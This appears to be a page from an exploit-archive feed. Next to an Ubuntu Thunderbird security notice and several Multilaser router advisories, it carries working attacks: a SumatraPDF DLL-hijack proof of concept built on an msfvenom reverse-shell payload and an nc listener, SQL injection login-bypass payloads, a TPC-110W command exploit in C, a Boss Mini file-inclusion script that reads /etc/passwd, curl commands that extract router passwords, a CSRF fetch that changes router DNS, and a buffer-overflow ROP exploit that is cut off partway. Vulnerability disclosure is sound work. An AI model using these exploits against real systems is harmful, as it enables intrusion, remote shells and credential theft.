Ubuntu Security Notice 6669-1 - Multiple security issues were discovered in Thunderbird. If a user were tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information, bypass security restrictions, cross-site tracing, or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6669-1March 04, 2024thunderbird vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Thunderbird.Software Description:- thunderbird: Mozilla Open Source mail and newsgroup clientDetails:Multiple security issues were discovered in Thunderbird. If a user weretricked into opening a specially crafted website in a browsing context, anattacker could potentially exploit these to cause a denial of service,obtain sensitive information, bypass security restrictions, cross-sitetracing, or execute arbitrary code. (CVE-2024-0741, CVE-2024-0742,CVE-2024-0747, CVE-2024-0749, CVE-2024-0750, CVE-2024-0751, CVE-2024-0753,CVE-2024-0755, CVE-2024-1547, CVE-2024-1548, CVE-2024-1549, CVE-2024-1550,CVE-2024-1553)Cornel Ionce discovered that Thunderbird did not properly manage memory whenopening the print preview dialog. An attacker could potentially exploitthis issue to cause a denial of service. (CVE-2024-0746)Alfred Peters discovered that Thunderbird did not properly manage memory whenstoring and re-accessing data on a networking channel. An attacker couldpotentially exploit this issue to cause a denial of service. (CVE-2024-1546)Johan Carlsson discovered that Thunderbird incorrectly handled Set-Cookieresponse headers in multipart HTTP responses. An attacker could potentiallyexploit this issue to inject arbitrary cookie values. (CVE-2024-1551)Gary Kwong discovered that Thunderbird incorrectly generated codes on 32-bitARM devices, which could lead to unexpected numeric conversions or undefinedbehaviour. An attacker could possibly use this issue to cause a denial ofservice. (CVE-2024-1552)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:  thunderbird                     1:115.8.1+build1-0ubuntu0.23.10.1Ubuntu 22.04 LTS:  thunderbird                     1:115.8.1+build1-0ubuntu0.22.04.1Ubuntu 20.04 LTS:  thunderbird                     1:115.8.1+build1-0ubuntu0.20.04.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6669-1  CVE-2024-0741, CVE-2024-0742, CVE-2024-0746, CVE-2024-0747,  CVE-2024-0749, CVE-2024-0750, CVE-2024-0751, CVE-2024-0753,  CVE-2024-0755, CVE-2024-1546, CVE-2024-1547, CVE-2024-1548,  CVE-2024-1549, CVE-2024-1550, CVE-2024-1551, CVE-2024-1552,  CVE-2024-1553Package Information:  https://launchpad.net/ubuntu/+source/thunderbird/1:115.8.1+build1-0ubuntu0.23.10.1  https://launchpad.net/ubuntu/+source/thunderbird/1:115.8.1+build1-0ubuntu0.22.04.1  https://launchpad.net/ubuntu/+source/thunderbird/1:115.8.1+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6669-1

SumatraPDF version 3.5.2 suffers from a DLL hijacking vulnerability using CRYPTBASE.DLL. DLL hijacking in this version was already discovered by Ravishanka Silva in February of 2024 but the findings did not include this DLL.

    SumatraPDF 3.5.2 DLL Hijack# Exploit Title: Sumatra PDF 3.5.2 DLL Hijack# Date: 03.03.2024# Exploit Author: Krishna Vamshi Katta Rokkaiah# Vendor Homepage: https://www.sumatrapdfreader.org/free-pdf-reader# Software Link: https://www.sumatrapdfreader.org/download-free-pdf-viewer# Version: 3.5.2# Tested on: Windows 11# CVE : CVE-2024-25884Description:In Sumatra PDF version 3.5.2, a DLL hijacking vulnerability is possible allowing a local attacker to get a shell and execute code on the host system in context of the currently logged-on user. This is possible by creating / placing a malicious DLL in the installation directory. The affected DLL is CRYPTBASE.DLL.Proof of Concept:1. Use MSFVenom to create a malicious DLL:msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=7777 -f dll -o CRYPTBASE.DLL2. Copy this file to the Sumatra PDF installation folder:C:\Users\<username>\AppData\Local\SumatraPDF\3. Start a listener in attacking system:nc -nlvp 77774. Start the Sumatra PDF application and notice a reverse shell in the attacking system.Demo:https://drive.google.com/file/d/1dSJG_JwxPd9ztAzDs6xV4y83-c_83AOx/view

SumatraPDF 3.5.2 DLL Hijacking

Employee Management System version 1.0-2024 suffers from a remote SQL injection vulnerability. Original discovery of this finding is attributed to Ozlem Balci in January of 2024.

    ## Title: employee_akpoly-management-system-1.0-2024 Multiple-SQLi## Author: nu11secur1ty## Date: 03/01/2024## Vendor: https://www.sourcecodester.com/users/walterjnr1## Software: https://www.sourcecodester.com/php/16999/employee-management-system.html## Reference: https://portswigger.net/web-security/sql-injection## Description:Potential SQLi detected in password parameter. Please confirm itmanually... The payload from the puncher_SQLi_bypass_authenticationmodule was submitted successfully after the test. You must testmanually to confirm this vulnerability! By using this vulnerabilitythe attackercan get control against an admin account and even more bad things!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: txtpassword (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR NOT2215=2215# TKHd&btnlogin=    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR (SELECT2145 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT(ELT(2145=2145,1))),0x716a787171,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# JjHm&btnlogin=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' AND (SELECT3563 FROM (SELECT(SLEEP(7)))nLaZ)# ZzRM&btnlogin=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Walterjnr1/2024/employee_akpoly-1.0-2024)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/employeeakpoly-10-2024-multiple-sqli.html)## Time spend:00:35:00

Employee Management System 1.0-2024 SQL Injection

TPC-110W suffers from a missing authentication vulnerability.

    #include <stdio.h>#include <stdlib.h>#include <string.h>#include <sys/socket.h>#include <arpa/inet.h>#include <unistd.h>int main(int argc, char *argv[]) {    int sock;    struct sockaddr_in serv_addr;    char command[512];    sock = socket(AF_INET, SOCK_STREAM, 0);    if (sock < 0) {        perror("socket");        exit(1);    }    memset(&serv_addr, '0', sizeof(serv_addr));    serv_addr.sin_family = AF_INET;    serv_addr.sin_port = htons(8888); // The default port of TPC-110W is 8888    if (inet_pton(AF_INET, "192.168.1.10", &serv_addr.sin_addr) <= 0) { // Assuming the device's IP address is 192.168.1.10        perror("inet_pton");        exit(1);    }    if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {        perror("connect");        exit(1);    }    // Run command with root privileges    snprintf(command, sizeof(command), "id\n"); // Check user id    write(sock, command, strlen(command));    memset(command, '0', sizeof(command));    read(sock, command, sizeof(command));    printf("%s\n", command);    close(sock);    return 0;}//gcc -o tpc-110w-exploit tpc-110w-exp

TPC-110W Missing Authentication

Boss Mini version 1.4.0 suffers from a local file inclusion vulnerability.

    # Exploit Title: Boss Mini 1.4.0 - local file inclusion# Date: 07/12/2023# Exploit Author: [nltt0] (https://github.com/nltt-br))# CVE: CVE-2023-3643''' _____       _                              _____ /  __ \     | |                            /  ___|| /  \/ __ _| | __ _ _ __   __ _  ___  ___ \ `--. | |    / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ / \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/                             __/ |                                            |___/                  '''from requests import post from urllib.parse import quotefrom argparse import ArgumentParsertry:    parser = ArgumentParser(description='Local file inclusion [Boss Mini]')    parser.add_argument('--domain', required=True, help='Application domain')    parser.add_argument('--file', required=True, help='Local file')    args = parser.parse_args()    host = args.domain    file = args.file    url = '{}/boss/servlet/document'.format(host)    file2 = quote(file, safe='')    headers = {        'Host': host,        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',        'Content-Type': 'application/x-www-form-urlencoded',        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',        'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)    }    data = {        'path': file2    }    try:        req = post(url, headers=headers, data=data, verify=False)        if req.status_code == 200:            print(req.text)    except Exception as e:        print('Error in {}'.format(e))          except Exception as e:    print('Error in {}'.format(e))

Boss Mini 1.4.0 Local File Inclusion

Multilaser RE160 versions 5.07.51_pt_MTL01 and 5.07.52_pt_MTL01 suffer from an access control bypass vulnerability through cookie manipulation.

=====[Tempest Security Intelligence - Security Advisory -  
CVE-2023-38946]=======

  Access Control Bypass in Multilaser router's Web Management Interface

  Author: Vinicius Moraes  < vinicius.moraes.w () gmail com >

=====[Table of  
Contents]========================================================

1. Overview  
2. Detailed description  
3. Other contexts & solutions  
4. Acknowledgements  
5. Timeline  
6. References

=====[1.  
Overview]==============================================================

* Systems affected: Multilaser RE160 web interface -  
V5.07.51_pt_MTL01(verified)  
                                                   -  
V5.07.52_pt_MTL01(verified)  
                                        (other routers/versions may be  
affected)  
* Release date: 28/02/2024  
* CVSS score: 7.7 / High  
* CVSS vector:  
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N  
* Impact: This vulnerability allows attackers to bypass the access control  
of  
          the router's web interface and perform management actions, such as  
          changing the DNS settings, enabling router remote access,  
changing the  
          IP routing table, and retrieving the WiFi and management  
application  
          passwords. A noteworthy aspect also regards the fact that the  
attack  
          can be conducted remotely.

=====[2. Detailed  
description]==================================================

The affected Multilaser router has a web management interface designed to  
graphically assist users in configuring features and diagnosing problems.  
However, there is a bug in its access control mechanism that allows  
unauthenticated users to access the router's management features.

In order to exploit this bug, it is necessary to add an "admin:" cookie in  
the  
requests. The following example shows how an unauthenticated user (not  
bearing  
a credential or session token) could perform it by using the curl tool[1]  
to  
retrieve, for example, a backup of the router config, which contains its  
web  
interface password:

[snippet]

$ # traditional unauthenticated request being redirected to the login page  
$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg | grep -E  
'HTTP/|Locatio'  
HTTP/1.0 302 Redirect  
Location: http://[routerIpAddress]/login.asp  
$  
$ # malicious unauthenticated request getting the web interface password  
$ # (in this example: "pass123")  
$ curl -isH 'Cookie: admin:' [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg |  
grep  
-E 'HTTP/|http_passwd'  
HTTP/1.0 200 OK  
http_passwd=pass123

[/snippet]

By performing the aforementioned steps, an attacker gains access to all  
features  
of the web interface, either by exploiting the issue in other endpoints or  
by  
using the interface password, contained in the router config, as a  
traditional  
user.

This vulnerability can be exploited remotely via a malicious mobile/desktop  
application performing HTTP requests against the router, or locally by  
connecting to a vulnerable router (such as through the wireless  
infrastructure  
of a coffee shop or airport).

=====[3. Other contexts &  
solutions]============================================

Conceptually, in order to fix this issue, the server receiving the request  
must  
always validate the value of the cookie as a prerequisite for enforcing  
access  
control. Besides that, this value cannot be predictable. Upon not receiving  
a  
valid session token within the request, users should be redirected to the  
login  
page.

Practically, updating to the latest firmware (V5.07.52_pt_MTL01) will  
reduce the  
attack window for this vulnerability, limiting the exploitation to only work  
when there is an active user session on the router. However, this equipment  
is  
also affected by another vulnerability with the same impact and no attack  
window  
limitation[3].

Furthermore, Multilaser informed that they contacted the firmware vendor of  
the  
model RE160, but due to the age of the equipment and its limitations, it  
will  
not receive an update. Therefore, it is recommended to replace the RE160  
router  
with a new one that is receiving updates (such as RE160V or RE163V)[4][5].

=====[4.  
Acknowledgements]======================================================

  Joaquim Brasil de Oliveira  < palulabrasil () gmail com >  
                              < twitter.com/palulabr >  
  Tempest Security Intelligence[2]

=====[5.  
Timeline]==============================================================

28/04/2023 - The bug regarding model RE160 was reported to vendor;  
29/06/2023 - A new contact was made with the company;  
29/06/2023 - Vendor sent the available latest firmware for RE160;  
07/07/2023 - It was confirmed that the latest firmware was still vulnerable;  
26/10/2023 - Vendor informed that RE160 will not receive a full fix.

=====[6.  
References]============================================================

  [1] https://curl.se  
  [2] https://tempest.com.br  
  [3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38945  
  [4]  
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v  
  [5]  
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v

Multilaser RE160 Cookie Manipulation Access Bypass

Multilaser RE160V web management interface versions 12.03.01.08_pt and 12.03.01.09_pt along with RE160 versions 5.07.51_pt_MTL01 and 5.07.52_pt_MTL01 suffer from an access control bypass vulnerability through URL manipulation.

    =====[Tempest Security Intelligence - Security Advisory -CVE-2023-38945]=======  Access Control Bypass in Multilaser routers' Web Management Interface  Author: Vinicius Moraes  < vinicius.moraes.w () gmail com >=====[Table ofContents]========================================================1. Overview2. Detailed description3. Other contexts & solutions4. Acknowledgements5. Timeline6. References=====[1.Overview]==============================================================* Systems affected: Multilaser RE160 web interface -V5.07.51_pt_MTL01(verified)                                                   -V5.07.52_pt_MTL01(verified)                                        (other routers/versions may beaffected)                    Multilaser RE160V web interface - V12.03.01.08_pt(verified)                                                    - V12.03.01.09_pt(verified)                                        (other routers/versions may beaffected)                    Multilaser RE163V web interface - V12.03.01.08_pt(verified)                                        (other routers/versions may beaffected)* Release date: 28/02/2024* CVSS score: 7.7 / High* CVSS vector:CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N* Impact: This vulnerability allows attackers to bypass the access controlof          the routers' web interface and perform management actions, such as          changing the DNS settings, enabling router remote access,changing the          IP routing table, and retrieving the WiFi and managementapplication          passwords. A noteworthy aspect also regards the fact that theattack          can be conducted remotely.=====[2. Detaileddescription]==================================================The affected Multilaser routers have a web management interface designed tographically assist users in configuring features and diagnosing problems.However, there is a bug in its access control mechanism that allowsunauthenticated users to access routers' management features.In order to exploit this bug, it is necessary to add a specific extensionat theend of the URLs. Some acceptable extension values are: js, css, png, jpg,gif,jsp. The following example shows how an unauthenticated user (not bearing acredential or session token) could perform it by using the curl tool[1] toretrieve, for example, a backup of the RE160 router config, which containsitsweb interface password:[snippet]$ # traditional unauthenticated request being redirected to the login page$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg | grep -E'HTTP/|Locatio'HTTP/1.0 302 RedirectLocation: http://[routerIpAddress]/login.asp$$ # malicious unauthenticated request getting the web interface password$ # (in this example: "pass123")$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/.js | grep -E'HTTP/|http_pass'HTTP/1.0 200 OKhttp_passwd=pass123[/snippet]Furthermore, the next example presents part of a JavaScript code that couldbeadded to a malicious website with the purpose of changing the router's DNSaddress and enabling remote access on vulnerable RE160V and RE163V routers.This can be achieved by exploiting this access control issue and a CSRF[3]:[code]fetch('http://[routerIpAddress]/goform/setSysTools/.js', {    'method': 'POST',    'mode': 'no-cors',    'headers': {        'Content-Type': 'application/x-www-form-urlencoded'    },    'body':'module2=wanAdvCfg&module3=lanCfg&lanDns1=[newDnsAddress]&lanDns2=&    module4=remoteWeb&remoteWebEn=true&remoteWebType=any&remoteWebPort=8080'})[/code]By performing the aforementioned steps, an attacker can gain access to allfeatures of the web interface.This vulnerability can be exploited remotely via a malicious website or amobile/desktop application performing HTTP requests against the router. Andalso locally, by connecting to a vulnerable router (such as through thewirelessinfrastructure of a coffee shop or airport).=====[3. Other contexts &solutions]============================================Conceptually, in order to fix this issue, the server receiving the requestmustalways validate the session token in authenticated features as aprerequisitefor enforcing access control, regardless of any extension in the URL. Uponnotreceiving a valid session token within the request, users should beredirectedto the login page.Practically, to mitigate this issue, the RE160V should be updated tofirmwareV12.03.01.12 or newer[4], the RE163V to firmware V12.03.01.10 or newer[5].Multilaser informed that they contacted the firmware vendor of the modelRE160,but due to the age of the equipment and its limitations, it will notreceive anupdate to fix the issue. Therefore, it is recommended to replace the RE160router with a new one that has received the fix (such as RE160V or RE163V).=====[4.Acknowledgements]======================================================  Joaquim Brasil de Oliveira  < palulabrasil () gmail com >                              < twitter.com/palulabr >  Tempest Security Intelligence[2]=====[5.Timeline]==============================================================13/02/2023 - The latest available firmware for model RE163V (V12.03.01.10)fixedthe bug;28/04/2023 - The bug regarding model RE160V was reported to the vendor;29/06/2023 - A new contact was made with the company;29/06/2023 - Vendor shared a firmware update (V12.03.01.09) for RE160V;07/07/2023 - The same bug in model RE160 was reported to the vendor;16/10/2023 - Vendor shared a new firmware for RE160V (V12.03.01.12) wherethebug was fixed;26/10/2023 - Vendor informed that RE160 will not receive a fix;26/10/2023 - Vendor released the RE160V update on its website[4].=====[6.References]============================================================  [1] https://curl.se  [2] https://tempest.com.br  [3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31152  [4]https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v  [5]https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v

Multilaser RE160V / RE160 URL Manipulation Access Bypass

Multilaser RE160V web management interface versions 12.03.01.09_pt and 12.03.01.10_pt suffer from an access control bypass vulnerability through header manipulation.

ulldisclosure-bounces@seclists.org>  
Status: RO  
Content-Length: 5433  
Lines: 153

=====[Tempest Security Intelligence - Security Advisory -  
CVE-2023-38944]=======

  Access Control Bypass in Multilaser routers' Web Management Interface

  Author: Vinicius Moraes  < vinicius.moraes.w () gmail com >

=====[Table of  
Contents]========================================================

1. Overview  
2. Detailed description  
3. Other contexts & solutions  
4. Acknowledgements  
5. Timeline  
6. References

=====[1.  
Overview]==============================================================

* Systems affected: Multilaser RE160V web interface - V12.03.01.09_pt  
(verified)  
                                        (other routers/versions may be  
affected)  
                    Multilaser RE163V web interface - V12.03.01.10_pt  
(verified)  
                                        (other routers/versions may be  
affected)  
* Release date: 28/02/2024  
* CVSS score: 7.7 / High  
* CVSS vector:  
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N  
* Impact: This vulnerability allows attackers to bypass the access control  
of  
          the routers' web interface and perform management actions, such as  
          changing the DNS settings, enabling router remote access,  
changing the  
          IP routing table, and retrieving the WiFi and management  
application  
          passwords. A noteworthy aspect also regards the fact that the  
attack  
          can be conducted remotely.

=====[2. Detailed  
description]==================================================

The affected Multilaser routers have a web management interface designed to  
graphically assist users in configuring features and diagnosing problems.  
However, there is a bug in its access control mechanism that allows  
unauthenticated users to access the routers' management features.

In order to exploit this bug, it is necessary to remove the Host header of  
the  
HTTP requests. The following example shows how an unauthenticated user (not  
bearing a credential or session token) could perform it by using the curl  
tool[1] to retrieve, for example, a backup of the router config:

[snippet]  
$ # traditional unauthenticated request being redirected to the login page  
$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/RouterCfm.cfg | head -8  
HTTP/1.0 302 Redirect  
Server: GoAhead-Webs  
Date: Sun Jun 28 11:59:42 2009  
Pragma: no-cache  
Cache-Control: no-cache  
Content-Type: text/html  
Location: http://[routerIpAddress]/login.html

$ # malicious unauthenticated request getting the router config  
$ curl -isOH 'Host:' [routerIpAddress]/cgi-bin/DownloadCfg/RouterCfm.cfg  
$ head -8 RouterCfm.cfg  
HTTP/1.0 200 OK  
Date: Sun Jun 28 12:00:00 2009  
Server: GoAhead-Webs  
Last-modified: Sun Jun 28 12:00:00 2009  
Content-length: 16108  
Content-type: config/conf  
Connection: close

[/snippet]

By performing the aforementioned steps, an attacker gains access to all  
features  
of the web interface, either by exploiting the issue in other endpoints or  
by  
using the interface password, contained in the router config, as a  
traditional  
user:

[snippet]

$ # getting the web interface password (in this example: "myPass333")  
$ # stored in base64 in the config file  
$ awk -F 'd=' '/http_passwd=/{ print $2 }' RouterCfm.cfg | tr -d '\15'  
bXlQYXNzMzMz  
$ # decoding the web interface password  
$ echo "bXlQYXNzMzMz" | base64 -d  
myPass333

[/snippet]

This vulnerability can be exploited remotely via a malicious mobile/desktop  
application performing HTTP requests against the router, or locally by  
connecting to a vulnerable router (such as through the wireless  
infrastructure  
of a coffee shop or airport).

=====[3. Other contexts &  
solutions]============================================

Conceptually, in order to fix this issue, the server receiving the request  
must  
always validate the session token as a prerequisite for enforcing access  
control, regardless of any header. Upon not receiving a valid session token  
within the request, users should be redirected to the login page.

Practically, to mitigate this issue, the routers should be updated to  
firmware  
V12.03.01.12 or newer[3][4].

=====[4.  
Acknowledgements]======================================================

  Joaquim Brasil de Oliveira  < palulabrasil () gmail com >  
                              < twitter.com/palulabr >  
  Tempest Security Intelligence[2]

=====[5.  
Timeline]==============================================================

28/04/2023 - The bug regarding model RE163V was reported to the vendor;  
29/06/2023 - A new contact was made with the company;  
29/06/2023 - Vendor informed they were analysing the bug;  
19/07/2023 - Vendor shared a new firmware update for RE163V;  
25/07/2023 - The same bug in model RE160V was reported to the vendor;  
04/08/2023 - Vendor shared a new firmware update for RE163V;  
30/08/2023 - Vendor fixed the bug in RE163V with firmware V12.03.01.12;  
16/10/2023 - Vendor fixed the bug in RE160V with firmware V12.03.01.12;  
26/10/2023 - vendor released the updates on its website[3][4].

=====[6.  
References]============================================================

  [1] https://curl.se  
  [2] https://tempest.com.br  
  [3]  
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v  
  [4]  
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v

Multilaser RE160V Header Manipulation Access Bypass

A-PDF All to MP3 Converter version 2.0.0 overflow exploit with DEP Bypass with HeapCreate + HeapAlloc + some_memory_copy_function ROP chain.

    #!/usr/bin/python# Exploit Title: A-PDF All to MP3 Converter 2.0.0 - DEP Bypass with HeapCreate + HeapAlloc + some_memory_copy_function ROP chain# Date: 16 November 2023# Exploit Author: George Washington# Vendor Homepage: http://www.a-pdf.com/all-to-mp3/download.htm# Software Link: http://www.a-pdf.com/all-to-mp3/download.htm# Version: 2.0.0# Tested on: Windows 7 Ultimate 6.1.7601 SP1 Build 7601 x64# Based on: https://www.exploit-db.com/exploits/17275# Remarks: There are some changes to the ROP gadgets obtained from Alltomp3.exe# Video: https://youtu.be/_JEgdKjbtpIimport socket, structfile = "1.wav"size = 8000############ Parameters for HeapCreate() ############EXE = b"ZZZZ"                          # HeapCreate()EXE += b"AAAA"                         # RETEXE += struct.pack("<I", 0x00040000)   # Parameter 1 0x00040000EXE += struct.pack("<I", 0x00000000)   # Parameter 2 0x00000000EXE += struct.pack("<I", 0x00000000)   # Parameter 3 0x00000000EXE += b"YYYY"                         # HeapAlloc()EXE += b"BBBB"                         # RETEXE += b"CCCC"                         # Parameter 1 hHandleEXE += struct.pack("<I", 0x00000008)   # Parameter 2 0x00000008EXE += struct.pack("<I", 0x00000500)   # Parameter 3 0x00000500EXE += struct.pack("<I", 0x1002dd98)   # _memcpy_s()EXE += b"DDDD"                         # heap pointerEXE += b"EEEE"                         # heap pointerEXE += struct.pack("<I", 0x00000500)   # sizeEXE += b"GGGG"                         # shellcode pointerEXE += struct.pack("<I", 0x00000500)   # sizejunk = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1